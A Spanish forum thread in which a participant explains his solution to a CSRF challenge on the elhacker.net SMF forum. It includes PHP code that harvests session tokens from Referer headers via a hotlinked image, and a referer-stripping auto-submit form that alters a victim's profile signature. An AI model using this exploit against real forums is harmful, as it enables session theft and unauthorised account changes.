Tu método es muy difícil que funcione, ya que muchos datos tienes que ingresarlo manualmente y al tener varios tokens no sabrías correctamente quien es de quien. Y el plan era que el CSRF sea muy efectivo, así que tendrías que hacerte de algún método para que sea muy efectivo. Y al tener que descargar un archivo, pueda que el usuario lo ejecute con otro navegador o simplemente el token haya cambiado por diferentes motivos.

---

Bueno aquí detallo como hice todo.

Puntos importantes

• 1 - Obtener el token de sesión del usuario
• • 1.2- El token es una sesión PHP
• 2 - Para realizar el cambio de firma, es necesario enviar el contenido vía POST
  
  • 2.2 - Existe un filtro que cancela cualquier tipo de modificacion, si la petición proviene de un sitio remoto
• 3 - Hacer un exploit que sea lo mas efectivo y automatizado posible

1 - El primer punto era obtener el token de sesion del usuario. Primero como el objetivo del reto es un CSRF, debemos comenzar a descartar un posible XSS para obtener el token. Simplemente porque si fuera necesario un XSS, el reto fuera mejor sobre XSS y no sobre CSRF.

Hace tiempo The X-C3LL publico un articulo llamado "Universal Hijacking by <img> (GET Method) (http://0verl0ad.blogspot.com/2008/11/universal-hijacking-by-hotlinking-get.html)", que dicho método fue utilizado para realizar una escala de privilegio en SMF 2.0. Por hay anda el exploit que publicaron The X-C3LL y Seth.

No profundo mucho en el tema, simplemente dicho método consiste en capturar el referer. El referer contiene la dirección del ultimo sitio visitado (incluyendo la ruta y todo, no simplemente el dominio).

Aquí el código que hice para capturar solo las url que contenían el id de sesión del token

index.php

<?php
$http = apache_request_headers();//Contiene el contenido de la cabeseras....
//useragent, host, tipo de peticion, tipo de contenido, etc...
 
if(preg_match('/sesc/',$http['Referer'])) {//Se ejecuta solo si en el referer, existe la palabra sesc
 
 
$f = fopen('xd.txt',"a");//Abro el archivo xd.txt, para escribir en el...
//El puntero se coloca al final del fichero
 
fputs($f, $http['Referer']."<br>\n");//Escribo en el archivo xd.txt, la url del referer
 
fclose($f);//Cierro el recurso...
}
 
//Esta parte esta de mas, no es necesario... Solo es para generar una img xD
 
 
// Crear una imagen de 100*30
$im = imagecreate(100, 30);
 
// Fondo blanco y texto azul
$fondo = imagecolorallocate($im, 255, 255, 255);
$color_texto = imagecolorallocate($im, 0, 0, 255);
 
// Escribir la cadena en la parte superior izquierda
imagestring($im, 5, 0, 0, 'Hola mundo', $color_texto);
 
// Imprimir la imagen
header('Content-type: image/png');
 
imagepng($im);
imagedestroy($im);
?>
 

1.2 - Hay que tener en cuenta que el token es una sesión de PHP, por lo tanto por defecto se elimina cuando el usuario cierra el navegador o si desde php directamente se generar otra sesión.


2 - Para cambiar la firma es necesario realizar una petición POST. Y como es un CSRF tenemos que usar algún "código" que se ejecute del lado del cliente (navegador). Asi que debemos tener en cuenta que con lenguajes que se ejecuten del lado del servidor como PHP, Perl, Python, Ruby, etc... No funcionaria y la unica forma en ese caso seria primero hacer un secuestro de sesion o tener el usuario y password del usuario y simular un navegador pero eso ya no seria un CSRF.

2.2 - Existe un filtro que cancela cualquier modificación hacia el perfil del usuario, si la petición proviene de un sitio remoto. El bug esta en que si la petición no viene de ningún sitio remoto, entonce es permitible editar el perfil, en este caso la firma del usuario "pollo".

3 - Ahora pasamos a realizar el exploit que cambiaría la firma del usuario.

Como ya podemos obtener el token, ahora para que el exploit funcione es necesario realizar una petición POST que no contenga ninguna referencia.

A mi se me ocurrió la idea de ejecutar un código javascript directamente desde el navegador, el problema esta en que ahora no todo los navegadores no permiten la ejecución de javascript desde la barra de direcciones. Pero al parecer al abrir directamente una ventana emergente, puedes ejecutar un codigo javascript directamente (probado en firefox y opera, aunque en opera puedes ejecutar un código javascript directamente desde la barra de dirección).

Ahora para que el exploit sea muy efectivo, este debe ser capaz de obtener la id de sesión del usuario y luego generar un código "malicioso" capaz de editar la firma del usuario.

f.php

<?php
 
 
$secs = file_get_contents('xd.txt');//Capturo el contenido del archivo xd.txt
//Este contiene el token de sesion de los usuarios
 
preg_match('/sesc=(\w+)<br\>$/i', $secs, $result);//Capturo el ultimo token de sesion capturado
 
?>
 
 
<A href="javascript:document.write('<form action=\'http://foro.elhacker.net/profile2.html\' method=\'post\' accept-charset=\'ISO-8859-1\' name=\'creator\' id=\'creator\' enctype=\'multipart/form-data\'>  <input name=\'signature\' value=\'Ultra anti-0wneable! ??? - Hacked by Yoyahack!!!!!\'>  <input name=\'sc\' value=\'<?php echo $result[1]; ?>\'> <input name=\'userID\' value=\'322090\'> <input name=\'sa\' value=\'forumProfile\'><input type=\'submit\'></form><script>document.creator.submit()</script>');" target="_blank" onClick="window.open(this.href, this.target, 'width=700,height=400,location=0',true); return false;">Click aquí</A>
 

Con esto simplemente, el usuario debe citar, modificar algun post. Así capturaríamos el token de sesión y luego el usuario debe ir al sitio donde se encuentra alojado el archivo f.php y hacer click en "Click aquí".

Con 2 pasos simplemente bastaria y a si que es muy efectivo el exploit.

Se podría mejorar de muchas maneras, incluso es posible saber de quien es cada token de sesión jejeje. Así desconectaríamos a alguien en especifico.

Saludos.

Felicidades Yoya! Muy bueno :p

congrats!! @yoya

-berz3k.

Yo aunque se podría decir que he quedado segundo he hecho un post para mostrar como lo he ido desenvolviendo y resolviendo.  :P

Post - Solución al reto csrf de elhacker.net (http://www.seginformatica.net/2012/02/resolviendo-reto-csrf-de-elhackernet.html)

Porfavor, si se considera spam o molesta el enlace pido que sea borrado para no causar problemas con la administración y los moderadores.

¡Un saludo! Me ha gustado bastante el reto :)

No hay problema :) podrias poner la url del reto en tu blog


Recuerdo hace mucho tiempo cuando hicimos la auditoría a SMF 1.1.7 publiqué un bug de tipo CSRF que era explotable atraves de la imágen para obtener el token de sesión, de hecho este bug tiene tantos años como elhacker.net en la web usando smf.

Ese tipo de trucos, deberían crear un post para agregarlo todos. Igualmente lo que habías dicho de "Una forma de evitar el referer era via https hacia una url http ya que por politicas de seguridad de los exploradores no se envía el referer", Son muy buenos tips jejeje.


Saludos.

Una forma de evitar que robes el sc es activar la respuesta automática en el foro u.u si el pobre pollo9 lo supiera aún estaría entre nosotros :( ese es un tip para que las futuras generaciones se protejan jajaja creo que lo hablamos con WHK hace tiempo si mal no recuerdo ñ_ñ

Felicidades yoya, bien ejecutado.

Saludos.

gracias a todos por la felicitaciones ::)

Hey!!! Yoya!!! Congratulation mister!!!!